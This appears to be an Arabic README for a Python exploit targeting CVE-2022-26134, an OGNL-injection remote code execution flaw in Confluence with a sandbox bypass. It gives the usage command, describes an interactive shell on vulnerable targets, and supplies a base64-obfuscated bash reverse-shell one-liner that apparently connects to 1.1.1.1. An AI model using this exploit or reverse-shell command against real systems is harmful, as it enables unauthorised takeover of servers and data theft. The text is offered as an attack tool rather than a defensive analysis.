
[CVE-2022-26134]Confluence ثغرة RCE عبر حقن تعبير OGNL مع تجاوز sandbox bypass.
حقن تعبير OGNL في Confluence يؤدي إلى RCE(CVE-2022-26134) برهان المفهوم والاستغلال
إضافة تجاوز الصندوق الرملي (sandbox bypass)، ودعم الإصدارات العالية.
Usage: python Confluence_cve_2022_26134_RCE.py http://example.com/
سيتحقق السكريبت تلقائياً من وجود الثغرة في الهدف، وسيدخل إلى شبه شيل تفاعلي إذا كان الهدف ضعيفاً.
اختبار تحت لينكس:

اختبار تحت ويندوز:

فقط أدخل 'q' عند الرغبة في الخروج.
يتم تمرير معاملات الأوامر مباشرة إلى دالة runtime.exec، التي لا تملك سياق الشيل.
لذا.
تحت ويندوز، لا يمكن تنفيذ بعض الأوامر مثل dir مباشرة، يمكنك استخدام cmd.exe /c dir.
تحت لينكس، لا يمكن لبعض الرموز الخاصة أن تعمل. إذا كنت بحاجة لتنفيذ أمر يحتوي على رموز خاصة مثل reverse shell، يمكنك ترميزه بـ base64 ثم استخدام bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4ODggMD4mmQ==}|{base64,-d}|{bash,-i}.